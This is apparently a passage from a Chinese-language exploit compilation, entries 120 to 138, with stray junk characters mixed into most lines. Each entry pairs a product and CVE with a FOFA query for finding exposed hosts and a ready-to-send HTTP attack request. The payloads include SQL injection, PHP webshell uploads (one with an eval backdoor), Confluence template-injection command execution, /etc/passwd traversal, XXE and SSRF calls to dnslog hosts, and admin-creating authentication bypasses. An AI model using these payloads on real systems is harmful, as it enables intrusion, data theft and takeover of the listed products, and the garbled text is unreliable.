X-Originating-Ip: 1.1.1.1$ v3 P' e# }3 s N' @7 ]$ F) ]9 z
X-Remote-Ip: 1.1.1.1
8 P& }9 r; L, h( [" i1 l6 QX-Remote-Addr: 1.1.1.1+ |4 N6 d2 _1 w% _8 C6 q% ]5 t" {
Te: trailers- V2 S4 ~: L0 ]) K- j4 ^
Connection: close
" {6 u0 X, M/ i9 I/ O* @/ w/ l# f% ~. p9 v
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
; ]0 R8 }8 n. [: k9 X6 I6 x
: O0 N/ h! m8 l: k P* m" x. X }- l4 f, x: O6 F
120. 北京百绰智能S40管理平台导入web.php任意文件上传
2 n0 @% f9 Q; K- l+ yCVE-2024-1253
# ^/ u' v: q) Y' X- A- t* DFOFA:title="Smart管理平台"0 R( r" o. q* D4 b
POST /useratte/web.php? HTTP/1.1
* a J/ L* {0 e, H+ ]Host: ip:port1 `# ^- M+ h0 H
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db! [7 \7 e' I! U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
( l* h7 D+ s: d% y+ d+ mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ n' N3 x& `8 Z" u8 [6 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 q/ }0 j- i& z/ `+ x4 P/ e$ PAccept-Encoding: gzip, deflate" [" V+ f9 x2 c) p& B/ j. I: h
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
+ Z2 R. ?& v- P+ GContent-Length: 597- @% J& T6 L' X* M% p- A) @
Origin: https://ip:port1 V' {0 P8 r, v- J [- R7 N
Referer: https://ip:port/sysmanage/licence.php: R! X" e& S4 g2 d, n
Upgrade-Insecure-Requests: 13 I1 ~+ p( r3 X, [" w
Sec-Fetch-Dest: document
( ?+ S, ^) A: h. m3 aSec-Fetch-Mode: navigate
. f3 C5 ]. ^+ W1 M, T! o8 \Sec-Fetch-Site: same-origin7 Z. T6 v* e2 K ]: o
Sec-Fetch-User: ?1
7 c1 p# S" ~; h7 l" k7 pTe: trailers
( L! H( G6 e, IConnection: close
1 g4 A; E- F, G' U3 n+ L* L' \$ a, @' G8 I! Q( S- N7 |
-----------------------------42328904123665875270630079328
3 ]% }% ]# A! E2 I) d: [Content-Disposition: form-data; name="file_upload"; filename="2.php"
* m! t% w2 p" M. Z. h8 iContent-Type: application/octet-stream
1 C: c. H; X, W0 j
( f3 f5 |) M6 s$ W<?php phpinfo()?>
& ^/ ^; J! X1 @- K# }6 E-----------------------------42328904123665875270630079328+ ~% ]2 a! z" k1 \& }: W+ e
Content-Disposition: form-data; name="id_type"& G2 X7 v' p9 l& ?6 }; t. c
2 l, } E! V0 k
1* `5 S$ U3 U* R1 T* ]4 A, `7 d
-----------------------------42328904123665875270630079328
% E6 h3 f h% u9 ?3 j8 \1 I; N: [; PContent-Disposition: form-data; name="1_ck") a1 m, b9 \+ k, W: l& k
8 [' j$ ~6 T6 @/ A
1_radhttp
0 v+ Q" Z: p9 P: d-----------------------------42328904123665875270630079328
* q! V# n& \! B% S3 H6 UContent-Disposition: form-data; name="mode"" V7 a% S/ l* e2 R7 G
[0 x! Z6 A) @0 q) H
import0 v, P' R$ k# t
-----------------------------42328904123665875270630079328
" P! A% u# ?2 x- d9 v- _7 i8 q* p* L, o
: Y* q. E [' [- b `4 @
文件路径/upload/2.php$ f0 @" i' u+ V# S' \3 u) P" n$ N
0 X" D4 e7 T8 o8 V
121. 北京百绰智能S42管理平台userattestation.php任意文件上传/ X' E1 S1 a* [( P
CVE-2024-1918
8 X) B% d! }+ K! l/ o" wFOFA:title="Smart管理平台". v2 Z( I" Q: u, o: ?0 P7 k# m. n
POST /useratte/userattestation.php HTTP/1.1
3 J' r) L% T) o5 aHost: 192.168.40.130:8443: X5 S( H l- Z0 g1 a8 V
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
) H L" ?$ [. R0 k3 Q, h- B( n- TUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
+ Z0 g) U+ a+ n4 z( j" i( E nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 A$ k( \: Z9 x6 {" |) TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: P# Z( t3 L: ]/ N
Accept-Encoding: gzip, deflate
1 O l# V+ x2 LContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328; k% H" N% `/ Q k4 @2 b3 L" O2 c. j
Content-Length: 592
9 O8 W# N% p/ _+ n' `: N* L4 |; H) W7 gOrigin: https://192.168.40.130:8443
4 i2 h: R) d7 v; z6 I# GUpgrade-Insecure-Requests: 1/ m, R; m8 r& Z! v
Sec-Fetch-Dest: document( N4 b. U, e# T n4 ]$ t1 E% m
Sec-Fetch-Mode: navigate
8 s$ V( R3 p: p9 r; L& }& I- \6 x% iSec-Fetch-Site: same-origin
~1 N! L5 h! T+ j( m* {Sec-Fetch-User: ?1
" B( z. H+ Q; f% yTe: trailers
1 S4 K2 W5 q1 Z( ]5 {+ c, W) |; LConnection: close
( _, b, g8 t1 C! y/ y" d5 i: f* J3 m$ ^8 t. Y& ^1 V' o
-----------------------------42328904123665875270630079328# ]: W% |: d- o e) G3 u, c
Content-Disposition: form-data; name="web_img"; filename="1.php"
' P% `) a& {% Y+ l+ m& I6 V5 WContent-Type: application/octet-stream
9 g4 x" p) A# A H4 f# Y6 m* E
) S$ D1 A+ u% {. Q8 J<?php phpinfo();?>
, i, p4 p' w( {; T% k-----------------------------42328904123665875270630079328
' m6 j7 z4 L9 Y5 g' i$ b* mContent-Disposition: form-data; name="id_type"; u& L0 d" `" V. Y+ S: e
# W' D6 c ~0 R* O8 o4 f$ F& C+ G
14 c' |2 @0 Q7 o8 z& G( D: {
-----------------------------42328904123665875270630079328
( b0 C9 {" t2 P* o- |Content-Disposition: form-data; name="1_ck"4 n; J6 @4 C* e$ b* h( ~5 u% W3 ?
" s$ Y, ` u& z7 o
1_radhttp
8 K& z4 e: f7 ?* A) C @-----------------------------42328904123665875270630079328& k- F* H% j- F1 P% O3 C5 g5 l
Content-Disposition: form-data; name="hidwel"2 y1 Y" U9 U- _5 c& f
: B x) X6 L) p5 Rset U5 a3 k8 d! X+ Q: l
-----------------------------42328904123665875270630079328. I6 L, j* J9 E
! I- u! C' Z) H7 e) g: j' H2 ?% S2 U- z5 i M3 I3 s0 }: g6 N0 T
boot/web/upload/weblogo/1.php
' C: N+ C# D w3 u# R' B8 N# N& ^$ i$ |% L6 Y4 s) ^
122. 北京百绰智能s200管理平台/importexport.php sql注入. L7 e0 m; F7 [! x( a( [/ k8 H
CVE-2024-27718FOFA:title="Smart管理平台" X3 J2 {4 q N6 u* @" y
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
% v, n. R" D) GGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.12 j8 d' V& G/ ?. B8 s& g
Host: x.x.x.x
d1 `9 y2 l6 _) ]* {Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
1 G! n! ~4 K& N' k/ KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ a% p! x; p4 c) xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ d0 D, @0 S* S6 }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 x1 f4 I* _+ d, oAccept-Encoding: gzip, deflate, br. w- v8 V( b2 A5 E' r
Upgrade-Insecure-Requests: 1
1 _" o, G& N' G; \9 p* `+ D! QSec-Fetch-Dest: document
U5 G7 K' S0 A. B5 y/ \, A0 T' BSec-Fetch-Mode: navigate5 x) j4 I2 l* e
Sec-Fetch-Site: none9 Q* b+ c5 s& {; e' @& Y
Sec-Fetch-User: ?1# A& r* e! A& i- g; N# `
Te: trailers
, M: S$ G! N9 V* ~& `Connection: close' R4 ]4 Z I4 b8 D6 m$ R
! ^5 o, T% b2 h! ]% b. N. v6 P/ f2 A$ S
123. Atlassian Confluence 模板注入代码执行
$ w( Q" Z/ p6 mFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
- Q. f0 b$ q2 | RPOST /template/aui/text-inline.vm HTTP/1.1
0 M4 f: _3 l9 B$ b" G7 U) vHost: localhost:8090
7 e5 B( d! J/ @+ }$ ^/ j; h+ T' S& \Accept-Encoding: gzip, deflate, br6 K4 R0 B( J7 M) M7 U7 t5 r& }- U
Accept: */*$ T4 E+ Q7 M) b! b
Accept-Language: en-US;q=0.9,en;q=0.8
1 l6 ~" A. C( v! p9 a5 A' s$ TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
2 o6 y8 o9 B- U) z; XConnection: close8 C. X# ~, t, `( `
Content-Type: application/x-www-form-urlencoded9 D7 ]0 Q g: S" G4 t6 J
; W7 n# p$ q/ }label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))2 D) y) a2 `2 [( b) l
: |6 ]6 x, w6 k* z9 i
" l% A, V+ H4 |+ k% B$ K124. 湖南建研工程质量检测系统任意文件上传
/ b) L7 s' _5 }3 BFOFA:body="/Content/Theme/Standard/webSite/login.css"8 ^- {3 \/ C4 \" {, Y
POST /Scripts/admintool?type=updatefile HTTP/1.1' z- y6 {8 H+ N6 F4 N/ c
Host: 192.168.40.130:8282
1 f, B- j% w& r8 @User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
q: A& P5 c; aContent-Length: 72
! d" S6 I8 _ o) u0 J$ D& OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.80 K- L% G' g: {+ E0 f
Accept-Encoding: gzip, deflate, br. @& Z7 e. G: |* b" E0 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" ?9 D. u |9 E( h4 ]Connection: close" J+ h1 }; a; H7 d: B- M7 ]; B/ C0 V
Content-Type: application/x-www-form-urlencoded
% \, X' M+ n% z) c8 W) u) F# a+ ^! @# h$ c+ s4 y! Y \/ g
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
! o. o8 t# O' K$ D( ?2 Q/ L% g
: g& N; v l( M( Y
1 x9 i2 U3 C( t) vhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
) L S& d( m( s/ X2 O x3 b3 O! E! A# B G- H
125. ConnectWise ScreenConnect身份验证绕过) B/ z1 J" M7 [' o1 U& R
CVE-2024-1709
& R& f( K" u8 c/ Y# R7 }FOFA:icon_hash="-82958153"
* r0 X4 [8 @5 n" a! J2 h Xhttps://github.com/watchtowrlabs ... bypass-add-user-poc4 A- z7 x5 g! m% o. C: S! D
# V& B. p- |, n
- t$ r" ]9 C4 b6 ^) ?3 U使用方法% ]* B* D3 t7 g$ q& Y
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
" i6 m) }+ s1 y8 u0 y; `
. ?) W, l& ^+ |$ q) f- ^5 K7 @0 u. u& s
创建好用户后直接登录后台,可以执行系统命令。
. [* l( ]; O1 T5 h2 }% F7 d9 o% R) R, ^3 A$ G8 m5 ?$ Z. a _
126. Aiohttp 路径遍历
( _: Y" W! m0 a# v( k- j/ CFOFA:title=="ComfyUI"
( I) Z5 q9 K$ U+ kGET /static/../../../../../etc/passwd HTTP/1.1
) d0 m& V* g5 KHost: x.x.x.x3 L) {: C" c& D$ c0 j6 o1 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' g1 S1 a4 s) _ z) g) d
Connection: close( d6 Z' U6 F/ H9 a: D% n
Accept: */*
% d7 l" L$ G, s6 ?% a' h- FAccept-Language: en
( p% _# |, R; V& H. sAccept-Encoding: gzip
, ?! G; ?8 ^" Q. P
! Q: a% A _' G7 k; v$ r* a
( i9 d5 K! }* }) S127. 广联达Linkworks DataExchange.ashx XXE7 Z, ?" X1 v/ k. Q
FOFA:body="Services/Identification/login.ashx"
: A: ]: L% ? F3 j1 [3 mPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
6 s2 Y2 S; H, eHost: 192.168.40.130:88881 e/ A; ^# f# V0 A, i% ` _) U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
% d9 v5 v* y0 j7 {& L; \: TContent-Length: 4156 T) l/ T Z' m. V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 D; F3 N9 t. A V O1 TAccept-Encoding: gzip, deflate
# s" I: C/ I: G4 y% ]) X6 vAccept-Language: zh-CN,zh;q=0.9
" d: }5 i/ ^3 E KConnection: close5 d! A. L# G$ w N; u
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0, ~$ ^" i8 D3 C* s
Purpose: prefetch0 N5 U' p1 B! w8 O6 U& M4 y8 P
Sec-Purpose: prefetch;prerender
% z# Q1 T+ P( [* X6 y: {% E- `+ `0 U4 B2 C
------WebKitFormBoundaryJGgV5l5ta05yAIe05 X. k, W0 n4 F6 p5 V3 w7 z4 O4 r
Content-Disposition: form-data;name="SystemName"
5 \* _8 u; e9 s6 x1 t& W
. t* X4 G7 ^8 Z- u# O9 mBIM) [$ Z' }( ], C* i4 x
------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ v3 M/ S* [4 ?+ qContent-Disposition: form-data;name="Params"
, q4 H, e6 a2 P1 [' yContent-Type: text/plain7 k6 c; h/ H5 [4 R
: N& H, l, y; n2 r<?xml version="1.0" encoding="UTF-8"?>
9 u' c! v1 W+ ?! c; E: x<!DOCTYPE test [
8 k, m0 v; {2 a$ c/ W<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">/ i- z7 y( y: i( H$ F$ S6 o
]6 b/ Y7 Z9 f6 z g; v9 m& J
> `7 n, {/ d. l8 a
<test>&t;</test>
& O; `, g* ~0 J# M% ?7 C------WebKitFormBoundaryJGgV5l5ta05yAIe0--
. N+ v# q1 b: {. y) e* f! f$ L+ R6 v+ k
z# ~. H; U7 A$ |( i7 ?
$ l6 R" O# v9 e128. Adobe ColdFusion 反序列化
; s! p+ D1 x/ c8 A& |CVE-2023-38203% E: W0 h+ w. \! [+ |
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)8 W: x' v8 d- ?+ D% {
FOFA:app="Adobe-ColdFusion", X w6 q7 M2 e/ w# N4 n& j5 `" l
PAYLOAD! q+ t6 Z i g2 x+ [7 e. Q1 s
6 T0 |( T: A `4 e: G9 K
129. Adobe ColdFusion 任意文件读取
( J2 N2 q4 }' @: ICVE-2024-20767( e/ D4 O! W( f: B
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"# i) k* z e1 Z0 m
第一步,获取uuid. W8 R3 x( P8 |6 |. K# r
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
) z/ E. h. F# q, NHost: x.x.x.x& w1 B2 H! o$ b$ L7 v6 s9 N" k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 R1 F5 N/ a) f6 h2 b- J; ~/ j' l/ EAccept: */*
% f" h& l6 W& O" C8 z9 mAccept-Encoding: gzip, deflate
2 S/ S* p/ d) V- kConnection: close2 f- [5 _6 O5 ^. D* N r3 W, g
5 [9 N: j5 _. b6 A' E' V
' }; N3 @$ F4 G$ t" t) [
第二步,读取/etc/passwd文件8 x8 J K, L0 g: F/ ?0 K7 a
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.15 F+ G7 F7 ]' o" P" y
Host: x.x.x.x
) ^7 d' \* {. q/ A% U3 }/ l0 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 @1 k1 c0 U8 KAccept: */*
% w7 H7 H* K& {/ B% uAccept-Encoding: gzip, deflate
, z1 t4 u6 P" x: \! X" YConnection: close
5 d' m- U q2 z. euuid: 85f60018-a654-4410-a783-f81cbd5000b9
( v: q$ y D: J0 M$ z5 B! N4 J, `+ g$ E! l" _1 _5 K4 I* H
" I* u# O# P6 A* d7 l130. Laykefu客服系统任意文件上传9 t4 I6 x$ k! H9 M- H3 C
FOFA:icon_hash="-334624619"+ Y2 P2 x8 W |/ Y! n9 M" y
POST /admin/users/upavatar.html HTTP/1.1
+ w i3 I/ ~: ?4 h8 y3 @Host: 127.0.0.1* y# l n) `1 C/ i3 A! M1 E$ t, C+ R
Accept: application/json, text/javascript, */*; q=0.01, S& b$ ~0 V$ k
X-Requested-With: XMLHttpRequest/ h$ _# a x9 W7 Z' s4 G! w
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26' N2 y" U* A8 w) T4 o$ Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR, ]' [8 B2 q( H+ g8 ?
Accept-Encoding: gzip, deflate+ D1 n: ^5 C; Z# D% `. u
Accept-Language: zh-CN,zh;q=0.9) F( E" r3 f- O+ t' {
Cookie: user_name=1; user_id=3
, K. y* s5 b# {Connection: close: Q+ z1 H, H! L" h
1 p7 L# y8 d w% N" R; m; z% \
------WebKitFormBoundary3OCVBiwBVsNuB2kR& {8 Z( n% ?% I9 g2 G
Content-Disposition: form-data; name="file"; filename="1.php". m/ D* J! D8 D: V
Content-Type: image/png# C* z! H2 N; [6 V9 S
4 N6 \& K1 L, D! e) s: |7 I/ Q9 z<?php phpinfo();@eval($_POST['sec']);?>' `4 ]- R) J5 t; M
------WebKitFormBoundary3OCVBiwBVsNuB2kR--4 S# `2 d9 o* Q' K1 C, [, P
0 _- B/ t1 o: X7 K
: k0 ]- T# w9 O3 E& [) G( t$ m131. Mini-Tmall <=20231017 SQL注入5 T( y; g/ |, n" a' Y( | L9 ]
FOFA:icon_hash="-2087517259"- h* o, {4 p! i
后台地址:http://localhost:8080/tmall/admin
+ f. X' N5 a3 H& ?: v! c6 _http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
; E: J8 |0 f9 G2 ?5 M6 O4 C. `0 w) M
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
( P5 Y1 w' W3 g! K# X ^CVE-2024-27198 D7 h" F) s/ _3 `8 e& h
FOFA:body="Log in to TeamCity"
c* X; `4 u0 i/ o, g: E, {+ P4 yPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
. \1 e I: ]5 Y1 b2 k8 Q8 L* r WHost: 192.168.40.130:8111- T+ O& @3 b( I4 t; S& n# t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 p X$ s3 a2 pAccept: */*
& L+ d! g% ^) h/ G* @' \$ `Content-Type: application/json
T. L( g7 o( @0 J9 m) Q& p0 XAccept-Encoding: gzip, deflate
' y) Q- M5 U$ ~) {7 J5 N7 `! q8 C% H! S( p$ a$ `( A
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
7 k2 y u4 s) l" F* i/ P
# m& z2 H5 b0 z* z3 q( e7 G
% x# y7 m+ P7 @" yCVE-2024-27199
3 N$ N& f3 C" ^8 u/ E/res/../admin/diagnostic.jsp
" _1 P* }# d h- C; j# n1 W+ Q/.well-known/acme-challenge/../../admin/diagnostic.jsp
$ n1 k ?9 j3 D" K% E/ _& Q8 v- ^/update/../admin/diagnostic.jsp
6 k! B1 T2 k2 B! D5 v5 R. X
n( \' T" l8 f2 K
/ l1 L+ P! r4 ?+ m# vCVE-2024-27198-RCE.py7 r. L$ w! t9 n' }9 B( M
: h* l( ~3 K$ L7 Z3 T
133. H5 云商城 file.php 文件上传* h, G" ]- ~( I8 o4 ]7 r
FOFA:body="/public/qbsp.php"" g% u$ L6 a& q8 ]: u! N" L4 t+ M* [" L l
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1' h. [0 ?: c# s; w" M, F7 d$ B
Host: your-ip- [7 u4 Q" Z' }( h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- Z% o$ M$ f# T+ A O- j, y" H# CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx g8 W( e; p5 g/ ^ M
2 \2 F5 s: j5 j2 d" k& c! a; u, Q9 x
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
8 ?$ L) z1 C& S, BContent-Disposition: form-data; name="file"; filename="rce.php"6 c) D" z6 E9 R; q
Content-Type: application/octet-stream. t1 b4 T( Q/ O6 i7 I6 s1 `
: V* p( L- k {; v1 X9 B
<?php system("cat /etc/passwd");unlink(__FILE__);?>
. q3 z, Y, d' R+ g------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
1 R5 q* ^& M1 s' M! y4 A
! e t$ W% A$ G3 }
" N v- x, g* n, ~. E. u" O1 ~% M; g' v% j( T3 T% g
134. 网康NS-ASG应用安全网关index.php sql注入
1 H# ^# f1 Y# O2 m2 h; }CVE-2024-2330
) t3 F3 l3 h4 f: b, Q% KNetentsec NS-ASG Application Security Gateway 6.3版本8 F, B( g) H$ Y% C. W
FOFA:app="网康科技-NS-ASG安全网关"
0 T7 G1 H2 w. g3 |. W, _& E- APOST /protocol/index.php HTTP/1.1$ }+ F2 U V# O5 E0 z4 {) b6 n* u
Host: x.x.x.x4 r5 F2 x$ ?9 R& `8 B$ J$ I
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de9 I4 i1 o. j1 |/ D, {, P" l" B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0. h6 }8 Z2 Y) F' W# J
Accept: */*
1 V, |" d/ N* k8 M( e( ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' Y* Y3 g' \0 s, @$ T/ NAccept-Encoding: gzip, deflate4 s, M! f2 K3 f9 @& n
Sec-Fetch-Dest: empty
' O8 Y7 L, f a% q# JSec-Fetch-Mode: cors
/ E' a, X5 x+ ZSec-Fetch-Site: same-origin
3 c& L" ^2 f3 \' [+ |4 GTe: trailers
6 x- c5 v. e8 I( x1 K: gConnection: close) ~ Z5 n2 ]. e& ` b
Content-Type: application/x-www-form-urlencoded/ o& b6 O+ U: d$ t% _( y
Content-Length: 2633 X( N, ]5 N% K. N, r* o) m: n/ |
; y/ s# ^2 ?! P; I9 Njsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
6 v1 j3 J' D# O4 M$ m: i$ ^- h
* ~, n+ K$ G1 _' g4 }' f
8 O, V9 G: a1 }8 o' `. l135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入, j( Q2 c! ~6 l9 X i- G
CVE-2024-20227 i1 g* L" o( N/ A; c- e
Netentsec NS-ASG Application Security Gateway 6.3版本5 O& z7 M% p. H5 T6 `: g
FOFA:app="网康科技-NS-ASG安全网关"6 F' `. Y! X2 x/ J8 o( J6 p
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
1 z1 ?( J/ m9 i" pHost: x.x.x.x
5 y: Q8 _! d/ i& h& F0 Q4 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, S6 b P1 B/ d# j* ~4 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ u/ K6 F" U2 e0 }* _& f- G5 i2 JAccept-Encoding: gzip, deflate
; V3 F5 d# i2 \. N# AAccept-Language: zh-CN,zh;q=0.9. g% p4 S3 M' p: l% s
Connection: close- D9 [) F, F) [: \3 ]/ v2 z; v- _ T
; {& j# N4 R; v8 y8 g9 ~
7 X! G3 K/ p0 y2 R3 D1 ?
136. NextChat cors SSRF1 F0 h5 d s) I& \
CVE-2023-49785- N. |1 ~" W& b8 N c
FOFA:title="NextChat", X7 x% _5 |( ]4 z; w7 A
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
) o: A: ]) B" W1 `' P! ~Host: x.x.x.x:100009 {1 w% u4 _# ?7 J* A! x2 t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
o4 K2 p* Q5 eConnection: close0 P* I9 n t1 b# v: l6 Y- {
Accept: */*
}- u9 l; u. H, z: c9 }1 u7 lAccept-Language: en4 \. x4 K9 f' d3 f$ k3 g
Accept-Encoding: gzip
) a& @7 a! f2 C3 l: \" b+ _; }/ N+ N" m3 V4 T/ j0 }- ~
2 S B4 D& v! E0 `9 v
137. 福建科立迅通信指挥调度平台down_file.php sql注入
& \0 b9 U) {7 n9 K' N1 I+ [7 y2 T" WCVE-2024-2620- t/ h* E0 \; @. p! |: P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 D* ^* K! o. ^8 q( f' _: m3 n, Z- BGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.15 H4 R s6 r+ N8 l- ]8 Y
Host: x.x.x.x8 y( x W: D7 S6 A* f# Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 r1 O5 |% v# y2 k9 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, @( u( d( g* i j, t) u/ jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 P1 e9 F' {' S: E1 i& p% @- D4 r
Accept-Encoding: gzip, deflate, br! ~" U# N) k1 \ r' B
Connection: close
1 y$ x1 S3 N' L1 ~( H3 ~- tCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj; h3 k3 s: o& y( c: @/ a
Upgrade-Insecure-Requests: 1
4 @( j$ J; A% j* Q+ @4 Y' w2 ]+ O" R; H3 a" U
% E1 [% X' ]( H: i2 ^138. 福建科立讯通信指挥调度平台pwd_update.php sql注入& g+ B7 \) l- Q
CVE-2024-2621
8 W$ q) e! q s+ F% iFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"2 @- M$ O% c& D% L% k! _& }* {
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1- d& h2 ?. Z2 B8 a
Host: x.x.x.x0 y* V5 e, p7 x' W9 m8 u' t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 Y- R7 ]5 p. {$ O4 Z$ F3 `0 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
r/ {! k. M6 ^2 B1 x! Q2 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- \% j0 O5 K$ z6 _- k4 G6 jAccept-Encoding: gzip, deflate, br
5 O/ f$ o5 N2 [# D# mConnection: close
. L0 h6 F) i# D$ Y' c8 c" ]Upgrade-Insecure-Requests: 1
, Z8 Y$ \& b! e0 y6 y& @& n( y# O5 w
* f3 G! ]- C" p/ t& h. e3 ^$ E! T
